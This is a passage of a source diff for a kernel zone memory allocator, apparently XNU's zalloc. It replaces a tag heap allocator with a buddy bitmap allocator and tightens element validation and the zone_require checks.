+       zone_pva_t meta_pva = zone_pva_from_meta(meta);
        struct zone_page_metadata *tmp;
 
        if (!zone_pva_is_null(meta->zm_page_next)) {
-               tmp = zone_pva_to_meta(meta->zm_page_next, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_next);
                if (!zone_pva_is_equal(tmp->zm_page_prev, meta_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
@@ -780,14 +1019,48 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp,
        if (zone_pva_is_queue(meta->zm_page_prev)) {
                zone_queue_set_head(z, meta->zm_page_prev, meta_pva, meta);
        } else {
-               tmp = zone_pva_to_meta(meta->zm_page_prev, kind);
+               tmp = zone_pva_to_meta(meta->zm_page_prev);
                if (!zone_pva_is_equal(tmp->zm_page_next, meta_pva)) {
                        zone_page_metadata_list_corruption(z, meta);
                }
                tmp->zm_page_next = meta->zm_page_next;
        }
 
-       zone_meta_queue_push(z, headp, meta, kind);
+       meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 };
+}
+
+__header_always_inline void
+zone_meta_requeue(zone_t z, zone_pva_t *headp,
+    struct zone_page_metadata *meta)
+{
+       zone_meta_remqueue(z, meta);
+       zone_meta_queue_push(z, headp, meta);
+}
+
+/* prevents a given metadata from ever reaching the z_pageq_empty queue */
+static inline void
+zone_meta_lock_in_partial(zone_t z, struct zone_page_metadata *m, uint32_t len)
+{
+       uint16_t new_size = zone_meta_alloc_size_add(z, m, ZM_ALLOC_SIZE_LOCK);
+
+       assert(new_size % sizeof(vm_offset_t) == ZM_ALLOC_SIZE_LOCK);
+       if (new_size == ZM_ALLOC_SIZE_LOCK) {
+               zone_meta_requeue(z, &z->z_pageq_partial, m);
+               zone_counter_sub(z, z_wired_empty, len);
+       }
+}
+
+/* allows a given metadata to reach the z_pageq_empty queue again */
+static inline void
+zone_meta_unlock_from_partial(zone_t z, struct zone_page_metadata *m, uint32_t len)
+{
+       uint16_t new_size = zone_meta_alloc_size_sub(z, m, ZM_ALLOC_SIZE_LOCK);
+
+       assert(new_size % sizeof(vm_offset_t) == 0);
+       if (new_size == 0) {
+               zone_meta_requeue(z, &z->z_pageq_empty, m);
+               z->z_wired_empty += len;
+       }
 }
 
 /*
@@ -795,8 +1068,10 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp,
  * Must be called without the zone lock held as it might potentially block.
  */
 static void
-zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *to)
+zone_meta_populate(vm_offset_t base, vm_size_t size)
 {
+       struct zone_page_metadata *from = zone_meta_from_addr(base);
+       struct zone_page_metadata *to   = from + atop(size);
        vm_offset_t page_addr = trunc_page(from);
 
        for (; page_addr < (vm_offset_t)to; page_addr += PAGE_SIZE) {
@@ -838,54 +1113,59 @@ zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *t
        }
 }
 
-static inline bool
-zone_allocated_element_offset_is_valid(zone_t zone, vm_offset_t addr,
-    vm_offset_t page, zone_addr_kind_t kind)
+__header_always_inline
+struct zone_page_metadata *
+zone_element_validate(zone_t zone, zone_element_t ze)
 {
-       vm_offset_t offs = addr - page - ZONE_PAGE_FIRST_OFFSET(kind);
-       vm_offset_t esize = zone_elem_size(zone);
+       struct zone_page_metadata *meta;
+       vm_offset_t page = zone_element_base(ze);
 
-       if (esize & (esize - 1)) { /* not a power of 2 */
-               return (offs % esize) == 0;
-       } else {
-               return (offs & (esize - 1)) == 0;
+       if (!from_zone_map(page, 1, ZONE_ADDR_NATIVE) &&
+           !from_zone_map(page, 1, ZONE_ADDR_FOREIGN)) {
+               zone_invalid_element_panic(zone, ze);
+       }
+       meta = zone_meta_from_addr(page);
+
+       if (meta->zm_chunk_len > ZM_CHUNK_LEN_MAX) {
+               zone_invalid_element_panic(zone, ze);
+       }
+       if (zone_element_idx(ze) >= zone->z_chunk_elems) {
+               zone_invalid_element_panic(zone, ze);
+       }
+
+       if (!zone_has_index(zone, meta->zm_index)) {
+               vm_offset_t addr = zone_element_addr(ze, zone_elem_size(zone));
+               zone_page_metadata_index_confusion_panic(zone, addr, meta);
        }
+
+       return meta;
 }
 
 __attribute__((always_inline))
 static struct zone_page_metadata *
-zone_allocated_element_resolve(zone_t zone, vm_offset_t addr,
-    vm_offset_t *pagep, zone_addr_kind_t *kindp)
+zone_element_resolve(zone_t zone, vm_offset_t addr, vm_offset_t esize,
+    zone_element_t *ze)
 {
        struct zone_page_metadata *meta;
-       zone_addr_kind_t kind;
-       vm_offset_t page;
-       vm_offset_t esize = zone_elem_size(zone);
+       vm_offset_t page, eidx;
 
-       kind = zone_addr_kind(addr, esize);
+       if (!from_zone_map(addr, esize, ZONE_ADDR_NATIVE) &&
+           !from_zone_map(addr, esize, ZONE_ADDR_FOREIGN)) {
+               zone_invalid_element_addr_panic(zone, addr);
+       }
        page = trunc_page(addr);
-       meta = zone_meta_from_addr(addr, kind);
+       meta = zone_meta_from_addr(addr);
 
-       if (kind == ZONE_ADDR_NATIVE) {
-               if (meta->zm_secondary_page) {
-                       if (meta->zm_percpu) {
-                               zone_invalid_element_addr_panic(zone, addr);
-                       }
-                       page -= ptoa(meta->zm_page_count);
-                       meta -= meta->zm_page_count;
-               }
-       } else if (!zone->allows_foreign) {
-               zone_page_metadata_foreign_confusion_panic(zone, addr);
-#if __LP64__
-       } else if (!from_foreign_range(addr, esize)) {
-               zone_invalid_foreign_addr_panic(zone, addr);
-#else
-       } else if (!pmap_kernel_va(addr)) {
+       if (meta->zm_chunk_len == ZM_SECONDARY_PCPU_PAGE) {
                zone_invalid_element_addr_panic(zone, addr);
-#endif
+       }
+       if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+               page -= ptoa(meta->zm_page_index);
+               meta -= meta->zm_page_index;
        }
 
-       if (!zone_allocated_element_offset_is_valid(zone, addr, page, kind)) {
+       eidx = (addr - page) / esize;
+       if ((addr - page) % esize) {
                zone_invalid_element_addr_panic(zone, addr);
        }
 
@@ -893,86 +1173,27 @@ zone_allocated_element_resolve(zone_t zone, vm_offset_t addr,
                zone_page_metadata_index_confusion_panic(zone, addr, meta);
        }
 
-       if (kindp) {
-               *kindp = kind;
-       }
-       if (pagep) {
-               *pagep = page;
-       }
+       *ze = zone_element_encode(page, eidx, ZPM_AUTO);
        return meta;
 }
 
-__attribute__((always_inline))
-void
-zone_allocated_element_validate(zone_t zone, vm_offset_t addr)
-{
-       zone_allocated_element_resolve(zone, addr, NULL, NULL);
-}
-
-__header_always_inline vm_offset_t
-zone_page_meta_get_freelist(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t page)
-{
-       assert(!meta->zm_secondary_page);
-       if (meta->zm_freelist_offs == PAGE_METADATA_EMPTY_FREELIST) {
-               return 0;
-       }
-
-       vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-       if (meta->zm_freelist_offs + zone_elem_size(zone) > size) {
-               zone_metadata_corruption(zone, meta, "freelist corruption");
-       }
-
-       return page + meta->zm_freelist_offs;
-}
-
-__header_always_inline void
-zone_page_meta_set_freelist(struct zone_page_metadata *meta,
-    vm_offset_t page, vm_offset_t addr)
-{
-       assert(!meta->zm_secondary_page);
-       if (addr) {
-               meta->zm_freelist_offs = (uint16_t)(addr - page);
-       } else {
-               meta->zm_freelist_offs = PAGE_METADATA_EMPTY_FREELIST;
-       }
-}
-
-static bool
-zone_page_meta_is_sane_element(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t page, vm_offset_t element, zone_addr_kind_t kind)
-{
-       if (element == 0) {
-               /* ends of the freelist are NULL */
-               return true;
-       }
-       if (element < page + ZONE_PAGE_FIRST_OFFSET(kind)) {
-               return false;
-       }
-       vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count);
-       if (element > page + size - zone_elem_size(zone)) {
-               return false;
-       }
-       return true;
-}
-
 /* Routine to get the size of a zone allocated address.
  * If the address doesnt belong to the zone maps, returns 0.
  */
 vm_size_t
 zone_element_size(void *addr, zone_t *z)
 {
-       struct zone_page_metadata *meta;
        struct zone *src_zone;
 
-       if (from_zone_map(addr, sizeof(void *))) {
-               meta = zone_native_meta_from_addr(addr);
-               src_zone = &zone_array[meta->zm_index];
+       if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) {
+               src_zone = &zone_array[zone_index_from_ptr(addr)];
                if (z) {
                        *z = src_zone;
                }
                return zone_elem_size(src_zone);
        }
+
 #if CONFIG_GZALLOC
        if (__improbable(gzalloc_enabled())) {
                vm_size_t gzsize;
@@ -993,11 +1214,11 @@ zone_require_panic(zone_t zone, void *addr)
        uint32_t zindex;
        zone_t other;
 
-       if (!from_zone_map(addr, zone_elem_size(zone))) {
+       if (!from_zone_map(addr, zone_elem_size(zone), ZONE_ADDR_NATIVE)) {
                panic("zone_require failed: address not in a zone (addr: %p)", addr);
        }
 
-       zindex = zone_native_meta_from_addr(addr)->zm_index;
+       zindex = zone_index_from_ptr(addr);
        other = &zone_array[zindex];
        if (zindex >= os_atomic_load(&num_zones, relaxed) || !other->z_self) {
                panic("zone_require failed: invalid zone index %d "
@@ -1031,5116 +1252,7322 @@ zone_id_require_panic(zone_id_t zid, void *addr)
 void
 zone_require(zone_t zone, void *addr)
 {
-       if (__probable(from_general_submap(addr, zone_elem_size(zone)) &&
-           (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) {
-               return;
-       }
+       vm_size_t esize = zone_elem_size(zone);
+
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               if (zone_has_index(zone, zone_index_from_ptr(addr))) {
+                       return;
+               }
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone->gzalloc_tracked)) {
                return;
-       }
 #endif
+       }
        zone_require_panic(zone, addr);
 }
 
 void
 zone_id_require(zone_id_t zid, vm_size_t esize, void *addr)
 {
-       if (__probable(from_general_submap(addr, esize) &&
-           (zid == zone_native_meta_from_addr(addr)->zm_index))) {
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               if (zid == zone_index_from_ptr(addr)) {
+                       return;
+               }
+#if CONFIG_GZALLOC
+       } else if (__probable(zone_array[zid].gzalloc_tracked)) {
                return;
+#endif
        }
+       zone_id_require_panic(zid, addr);
+}
+
+void
+zone_id_require_allow_foreign(zone_id_t zid, vm_size_t esize, void *addr)
+{
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, esize, ZONE_ADDR_FOREIGN))) {
+               if (zid == zone_index_from_ptr(addr)) {
+                       return;
+               }
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone_array[zid].gzalloc_tracked)) {
                return;
-       }
 #endif
+       }
        zone_id_require_panic(zid, addr);
 }
 
 bool
 zone_owns(zone_t zone, void *addr)
 {
-       if (__probable(from_general_submap(addr, zone_elem_size(zone)) &&
-           (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) {
-               return true;
-       }
+       vm_size_t esize = zone_elem_size(zone);
+
+       if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) {
+               return zone_has_index(zone, zone_index_from_ptr(addr));
 #if CONFIG_GZALLOC
-       if (__probable(gzalloc_enabled())) {
+       } else if (__probable(zone->gzalloc_tracked)) {
                return true;
-       }
 #endif
+       }
        return false;
 }
 
-#pragma mark ZTAGS
-#if VM_MAX_TAG_ZONES
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone bits allocator
 
-// for zones with tagging enabled:
+/*!
+ * @defgroup Zone Bitmap allocator
+ * @{
+ *
+ * @brief
+ * Functions implementing the zone bitmap allocator
+ *
+ * @discussion
+ * The zone allocator maintains which elements are allocated or free in bitmaps.
+ *
+ * When the number of elements per page is smaller than 32, it is stored inline
+ * on the @c zone_page_metadata structure (@c zm_inline_bitmap is set,
+ * and @c zm_bitmap used for storage).
+ *
+ * When the number of elements is larger, then a bitmap is allocated from
+ * a buddy allocator (impelemented under the @c zba_* namespace). Pointers
+ * to bitmaps are implemented as a packed 32 bit bitmap reference, stored in
+ * @c zm_bitmap. The low 3 bits encode the scale (order) of the allocation in
+ * @c ZBA_GRANULE units, and hence actual allocations encoded with that scheme
+ * cannot be larger than 1024 bytes (8192 bits).
+ *
+ * This buddy allocator can actually accomodate allocations as large
+ * as 8k on 16k systems and 2k on 4k systems.
+ *
+ * Note: @c zba_* functions are implementation details not meant to be used
+ * outside of the allocation of the allocator itself. Interfaces to the rest of
+ * the zone allocator are documented and not @c zba_* prefixed.
+ */
 
-// calculate a pointer to the tag base entry,
-// holding either a uint32_t the first tag offset for a page in the zone map,
-// or two uint16_t tags if the page can only hold one or two elements
+#define ZBA_CHUNK_SIZE          PAGE_MAX_SIZE
+#define ZBA_GRANULE             sizeof(uint64_t)
+#define ZBA_GRANULE_BITS        (8 * sizeof(uint64_t))
+#define ZBA_MAX_ORDER           (PAGE_MAX_SHIFT - 4)
+#define ZBA_MAX_ALLOC_ORDER     7
+#define ZBA_SLOTS               (ZBA_CHUNK_SIZE / ZBA_GRANULE)
+static_assert(2ul * ZBA_GRANULE << ZBA_MAX_ORDER == ZBA_CHUNK_SIZE, "chunk sizes");
+static_assert(ZBA_MAX_ALLOC_ORDER <= ZBA_MAX_ORDER, "ZBA_MAX_ORDER is enough");
+
+struct zone_bits_chain {
+       uint32_t zbc_next;
+       uint32_t zbc_prev;
+} __attribute__((aligned(ZBA_GRANULE)));
+
+struct zone_bits_head {
+       uint32_t zbh_next;
+       uint32_t zbh_unused;
+} __attribute__((aligned(ZBA_GRANULE)));
+
+static_assert(sizeof(struct zone_bits_chain) == ZBA_GRANULE, "zbc size");
+static_assert(sizeof(struct zone_bits_head) == ZBA_GRANULE, "zbh size");
+
+struct zone_bits_allocator_meta {
+       uint32_t zbam_chunks;
+       uint32_t __zbam_padding;
+       struct zone_bits_head zbam_lists[ZBA_MAX_ORDER + 1];
+};
 
-#define ZTAGBASE(zone, element) \
-    (&((uint32_t *)zone_tagbase_min)[atop((element) - zone_info.zi_map_range.min_address)])
+struct zone_bits_allocator_header {
+       uint64_t zbah_bits[ZBA_SLOTS / (8 * sizeof(uint64_t))];
+};
 
-// pointer to the tag for an element
-#define ZTAG(zone, element)                                     \
-    ({                                                          \
-       vm_tag_t * result;                                      \
-       if ((zone)->tags_inline) {                              \
-           result = (vm_tag_t *) ZTAGBASE((zone), (element));  \
-           if ((page_mask & element) >= zone_elem_size(zone)) result++;    \
-       } else {                                                \
-           result =  &((vm_tag_t *)zone_tags_min)[ZTAGBASE((zone), (element))[0] + ((element) & page_mask) / zone_elem_size((zone))];   \
-       }                                                       \
-       result;                                                 \
-    })
+#if ZALLOC_TEST
+static struct zalloc_bits_allocator_test_setup {
+       vm_offset_t zbats_base;
+       void      (*zbats_populate)(vm_address_t addr, vm_size_t size);
+} zba_test_info;
 
+static struct zone_bits_allocator_header *
+zba_base_header(void)
+{
+       return (struct zone_bits_allocator_header *)zba_test_info.zbats_base;
+}
 
-static vm_offset_t  zone_tagbase_min;
-static vm_offset_t  zone_tagbase_max;
-static vm_offset_t  zone_tagbase_map_size;
-static vm_map_t     zone_tagbase_map;
+static void
+zba_populate(uint32_t n)
+{
+       vm_address_t base = zba_test_info.zbats_base;
+       zba_test_info.zbats_populate(base + n * ZBA_CHUNK_SIZE, ZBA_CHUNK_SIZE);
+}
+#else
+__startup_data
+static uint8_t zba_chunk_startup[ZBA_CHUNK_SIZE]
+__attribute__((aligned(ZBA_CHUNK_SIZE)));
+static LCK_MTX_EARLY_DECLARE(zba_mtx, &zone_locks_grp);
 
-static vm_offset_t  zone_tags_min;
-static vm_offset_t  zone_tags_max;
-static vm_offset_t  zone_tags_map_size;
-static vm_map_t     zone_tags_map;
+static struct zone_bits_allocator_header *
+zba_base_header(void)
+{
+       return (struct zone_bits_allocator_header *)zone_info.zi_bits_range.min_address;
+}
 
-// simple heap allocator for allocating the tags for new memory
+static void
+zba_lock(void)
+{
+       lck_mtx_lock(&zba_mtx);
+}
 
-LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */
+static void
+zba_unlock(void)
+{
+       lck_mtx_unlock(&zba_mtx);
+}
 
-enum{
-       ztFreeIndexCount = 8,
-       ztFreeIndexMax   = (ztFreeIndexCount - 1),
-       ztTagsPerBlock   = 4
-};
+static void
+zba_populate(uint32_t n)
+{
+       vm_size_t size = ZBA_CHUNK_SIZE;
+       vm_address_t addr;
 
-struct ztBlock {
-#if __LITTLE_ENDIAN__
-       uint64_t free:1,
-           next:21,
-           prev:21,
-           size:21;
-#else
-// ztBlock needs free bit least significant
-#error !__LITTLE_ENDIAN__
+       addr = zone_info.zi_bits_range.min_address + n * size;
+       if (addr >= zone_info.zi_bits_range.max_address) {
+               zone_t z = zone_find_largest();
+               panic("zba_populate: out of bitmap space, "
+                   "likely due to memory leak in zone [%s%s] "
+                   "(%luM, %d elements allocated)",
+                   zone_heap_name(z), zone_name(z),
+                   (unsigned long)zone_size_wired(z) >> 20,
+                   zone_count_allocated(z));
+       }
+
+       for (;;) {
+               kern_return_t kr = KERN_SUCCESS;
+
+               if (0 == pmap_find_phys(kernel_pmap, addr)) {
+                       kr = kernel_memory_populate(kernel_map, addr, size,
+                           KMA_NOPAGEWAIT | KMA_KOBJECT | KMA_ZERO,
+                           VM_KERN_MEMORY_OSFMK);
+               }
+
+               if (kr == KERN_SUCCESS) {
+                       return;
+               }
+
+               zba_unlock();
+               VM_PAGE_WAIT();
+               zba_lock();
+       }
+}
 #endif
-};
-typedef struct ztBlock ztBlock;
 
-static ztBlock * ztBlocks;
-static uint32_t  ztBlocksCount;
-static uint32_t  ztBlocksFree;
+__pure2
+static struct zone_bits_allocator_meta *
+zba_meta(void)
+{
+       return (struct zone_bits_allocator_meta *)&zba_base_header()[1];
+}
+
+__pure2
+static uint64_t *
+zba_slot_base(void)
+{
+       return (uint64_t *)zba_base_header();
+}
+
+__pure2
+static vm_address_t
+zba_page_addr(uint32_t n)
+{
+       return (vm_address_t)zba_base_header() + n * ZBA_CHUNK_SIZE;
+}
+
+__pure2
+static struct zone_bits_head *
+zba_head(uint32_t order)
+{
+       return &zba_meta()->zbam_lists[order];
+}
 
+__pure2
 static uint32_t
-ztLog2up(uint32_t size)
+zba_head_index(uint32_t order)
 {
-       if (1 == size) {
-               size = 0;
-       } else {
-               size = 32 - __builtin_clz(size - 1);
-       }
-       return size;
+       uint32_t hdr_size = sizeof(struct zone_bits_allocator_header) +
+           offsetof(struct zone_bits_allocator_meta, zbam_lists);
+       return (hdr_size / ZBA_GRANULE) + order;
 }
 
+__pure2
+static struct zone_bits_chain *
+zba_chain_for_index(uint32_t index)
+{
+       return (struct zone_bits_chain *)(zba_slot_base() + index);
+}
+
+__pure2
 static uint32_t
-ztLog2down(uint32_t size)
+zba_chain_to_index(const struct zone_bits_chain *zbc)
 {
-       size = 31 - __builtin_clz(size);
-       return size;
+       return (uint32_t)((const uint64_t *)zbc - zba_slot_base());
 }
 
+__abortlike
 static void
-ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags)
+zba_head_corruption_panic(uint32_t order)
 {
-       vm_map_offset_t addr = (vm_map_offset_t) address;
-       vm_map_offset_t page, end;
+       panic("zone bits allocator head[%d:%p] is corrupt", order,
+           zba_head(order));
+}
 
-       page = trunc_page(addr);
-       end  = round_page(addr + size);
+__abortlike
+static void
+zba_chain_corruption_panic(struct zone_bits_chain *a, struct zone_bits_chain *b)
+{
+       panic("zone bits allocator freelist is corrupt (%p <-> %p)", a, b);
+}
 
-       for (; page < end; page += page_size) {
-               if (!pmap_find_phys(kernel_pmap, page)) {
-                       kern_return_t __unused
-                       ret = kernel_memory_populate(map, page, PAGE_SIZE,
-                           KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG);
-                       assert(ret == KERN_SUCCESS);
+static void
+zba_push_block(struct zone_bits_chain *zbc, uint32_t order)
+{
+       struct zone_bits_head *hd = zba_head(order);
+       uint32_t hd_index = zba_head_index(order);
+       uint32_t index = zba_chain_to_index(zbc);
+       struct zone_bits_chain *next;
+
+       if (hd->zbh_next) {
+               next = zba_chain_for_index(hd->zbh_next);
+               if (next->zbc_prev != hd_index) {
+                       zba_head_corruption_panic(order);
                }
+               next->zbc_prev = index;
        }
+       zbc->zbc_next = hd->zbh_next;
+       zbc->zbc_prev = hd_index;
+       hd->zbh_next = index;
 }
 
-static boolean_t
-ztPresent(const void * address, size_t size)
+static void
+zba_remove_block(struct zone_bits_chain *zbc)
 {
-       vm_map_offset_t addr = (vm_map_offset_t) address;
-       vm_map_offset_t page, end;
-       boolean_t       result;
+       struct zone_bits_chain *prev = zba_chain_for_index(zbc->zbc_prev);
+       uint32_t index = zba_chain_to_index(zbc);
 
-       page = trunc_page(addr);
-       end  = round_page(addr + size);
-       for (result = TRUE; (page < end); page += page_size) {
-               result = pmap_find_phys(kernel_pmap, page);
-               if (!result) {
-                       break;
+       if (prev->zbc_next != index) {
+               zba_chain_corruption_panic(prev, zbc);
+       }
+       if ((prev->zbc_next = zbc->zbc_next)) {
+               struct zone_bits_chain *next = zba_chain_for_index(zbc->zbc_next);
+               if (next->zbc_prev != index) {
+                       zba_chain_corruption_panic(zbc, next);
                }
+               next->zbc_prev = zbc->zbc_prev;
        }
-       return result;
 }
 
-
-void __unused
-ztDump(boolean_t sanity);
-void __unused
-ztDump(boolean_t sanity)
+static vm_address_t
+zba_try_pop_block(uint32_t order)
 {
-       uint32_t q, cq, p;
+       struct zone_bits_head *hd = zba_head(order);
+       struct zone_bits_chain *zbc;
 
-       for (q = 0; q <= ztFreeIndexMax; q++) {
-               p = q;
-               do{
-                       if (sanity) {
-                               cq = ztLog2down(ztBlocks[p].size);
-                               if (cq > ztFreeIndexMax) {
-                                       cq = ztFreeIndexMax;
-                               }
-                               if (!ztBlocks[p].free
-                                   || ((p != q) && (q != cq))
-                                   || (ztBlocks[ztBlocks[p].next].prev != p)
-                                   || (ztBlocks[ztBlocks[p].prev].next != p)) {
-                                       kprintf("zterror at %d", p);
-                                       ztDump(FALSE);
-                                       kprintf("zterror at %d", p);
-                                       assert(FALSE);
-                               }
-                               continue;
-                       }
-                       kprintf("zt[%03d]%c %d, %d, %d\n",
-                           p, ztBlocks[p].free ? 'F' : 'A',
-                           ztBlocks[p].next, ztBlocks[p].prev,
-                           ztBlocks[p].size);
-                       p = ztBlocks[p].next;
-                       if (p == q) {
-                               break;
-                       }
-               }while (p != q);
-               if (!sanity) {
-                       printf("\n");
-               }
-       }
-       if (!sanity) {
-               printf("-----------------------\n");
+       if (hd->zbh_next == 0) {
+               return 0;
        }
+
+       zbc = zba_chain_for_index(hd->zbh_next);
+       zba_remove_block(zbc);
+       return (vm_address_t)zbc;
 }
 
+static struct zone_bits_allocator_header *
+zba_header(vm_offset_t addr)
+{
+       addr &= -(vm_offset_t)ZBA_CHUNK_SIZE;
+       return (struct zone_bits_allocator_header *)addr;
+}
 
+static size_t
+zba_node_parent(size_t node)
+{
+       return (node - 1) / 2;
+}
 
-#define ZTBDEQ(idx)                                                 \
-    ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next;     \
-    ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev;
+static size_t
+zba_node_left_child(size_t node)
+{
+       return node * 2 + 1;
+}
 
-static void
-ztFree(zone_t zone __unused, uint32_t index, uint32_t count)
+static size_t
+zba_node_buddy(size_t node)
 {
-       uint32_t q, w, p, size, merge;
+       return ((node - 1) ^ 1) + 1;
+}
 
-       assert(count);
-       ztBlocksFree += count;
+static size_t
+zba_node(vm_offset_t addr, uint32_t order)
+{
+       vm_offset_t offs = (addr % ZBA_CHUNK_SIZE) / ZBA_GRANULE;
+       return (offs >> order) + (1 << (ZBA_MAX_ORDER - order + 1)) - 1;
+}
 
-       // merge with preceding
-       merge = (index + count);
-       if ((merge < ztBlocksCount)
-           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
-           && ztBlocks[merge].free) {
-               ZTBDEQ(merge);
-               count += ztBlocks[merge].size;
-       }
-
-       // merge with following
-       merge = (index - 1);
-       if ((merge > ztFreeIndexMax)
-           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
-           && ztBlocks[merge].free) {
-               size = ztBlocks[merge].size;
-               count += size;
-               index -= size;
-               ZTBDEQ(index);
-       }
-
-       q = ztLog2down(count);
-       if (q > ztFreeIndexMax) {
-               q = ztFreeIndexMax;
-       }
-       w = q;
-       // queue in order of size
-       while (TRUE) {
-               p = ztBlocks[w].next;
-               if (p == q) {
-                       break;
-               }
-               if (ztBlocks[p].size >= count) {
-                       break;
-               }
-               w = p;
-       }
-       ztBlocks[p].prev = index;
-       ztBlocks[w].next = index;
-
-       // fault in first
-       ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
-
-       // mark first & last with free flag and size
-       ztBlocks[index].free = TRUE;
-       ztBlocks[index].size = count;
-       ztBlocks[index].prev = w;
-       ztBlocks[index].next = p;
-       if (count > 1) {
-               index += (count - 1);
-               // fault in last
-               ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
-               ztBlocks[index].free = TRUE;
-               ztBlocks[index].size = count;
-       }
+static struct zone_bits_chain *
+zba_chain_for_node(struct zone_bits_allocator_header *zbah, size_t node, uint32_t order)
+{
+       vm_offset_t offs = (node - (1 << (ZBA_MAX_ORDER - order + 1)) + 1) << order;
+       return (struct zone_bits_chain *)((vm_offset_t)zbah + offs * ZBA_GRANULE);
 }
 
-static uint32_t
-ztAlloc(zone_t zone, uint32_t count)
+static void
+zba_node_flip_split(struct zone_bits_allocator_header *zbah, size_t node)
 {
-       uint32_t q, w, p, leftover;
-
-       assert(count);
-
-       q = ztLog2up(count);
-       if (q > ztFreeIndexMax) {
-               q = ztFreeIndexMax;
-       }
-       do{
-               w = q;
-               while (TRUE) {
-                       p = ztBlocks[w].next;
-                       if (p == q) {
-                               break;
-                       }
-                       if (ztBlocks[p].size >= count) {
-                               // dequeue, mark both ends allocated
-                               ztBlocks[w].next = ztBlocks[p].next;
-                               ztBlocks[ztBlocks[p].next].prev = w;
-                               ztBlocks[p].free = FALSE;
-                               ztBlocksFree -= ztBlocks[p].size;
-                               if (ztBlocks[p].size > 1) {
-                                       ztBlocks[p + ztBlocks[p].size - 1].free = FALSE;
-                               }
-
-                               // fault all the allocation
-                               ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0);
-                               // mark last as allocated
-                               if (count > 1) {
-                                       ztBlocks[p + count - 1].free = FALSE;
-                               }
-                               // free remainder
-                               leftover = ztBlocks[p].size - count;
-                               if (leftover) {
-                                       ztFree(zone, p + ztBlocks[p].size - leftover, leftover);
-                               }
-
-                               return p;
-                       }
-                       w = p;
-               }
-               q++;
-       }while (q <= ztFreeIndexMax);
+       zbah->zbah_bits[node / 64] ^= 1ull << (node % 64);
+}
 
-       return -1U;
+static bool
+zba_node_is_split(struct zone_bits_allocator_header *zbah, size_t node)
+{
+       return zbah->zbah_bits[node / 64] & (1ull << (node % 64));
 }
 
-__startup_func
 static void
-zone_tagging_init(vm_size_t max_zonemap_size)
+zba_free(vm_offset_t addr, uint32_t order)
 {
-       kern_return_t         ret;
-       vm_map_kernel_flags_t vmk_flags;
-       uint32_t              idx;
-
-       // allocate submaps VM_KERN_MEMORY_DIAG
-
-       zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t);
-       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size,
-           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
-           &zone_tagbase_map);
+       struct zone_bits_allocator_header *zbah = zba_header(addr);
+       struct zone_bits_chain *zbc;
+       size_t node = zba_node(addr, order);
 
-       if (ret != KERN_SUCCESS) {
-               panic("zone_init: kmem_suballoc failed");
-       }
-       zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size);
+       while (node) {
+               size_t parent = zba_node_parent(node);
 
-       zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t);
-       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size,
-           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
-           &zone_tags_map);
+               zba_node_flip_split(zbah, parent);
+               if (zba_node_is_split(zbah, parent)) {
+                       break;
+               }
 
-       if (ret != KERN_SUCCESS) {
-               panic("zone_init: kmem_suballoc failed");
+               zbc = zba_chain_for_node(zbah, zba_node_buddy(node), order);
+               zba_remove_block(zbc);
+               order++;
+               node = parent;
        }
-       zone_tags_max = zone_tags_min + round_page(zone_tags_map_size);
-
-       ztBlocks = (ztBlock *) zone_tags_min;
-       ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock));
 
-       // initialize the qheads
-       lck_mtx_lock(&ztLock);
+       zba_push_block(zba_chain_for_node(zbah, node, order), order);
+}
 
-       ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0);
-       for (idx = 0; idx < ztFreeIndexCount; idx++) {
-               ztBlocks[idx].free = TRUE;
-               ztBlocks[idx].next = idx;
-               ztBlocks[idx].prev = idx;
-               ztBlocks[idx].size = 0;
+static vm_size_t
+zba_chunk_header_size(uint32_t n)
+{
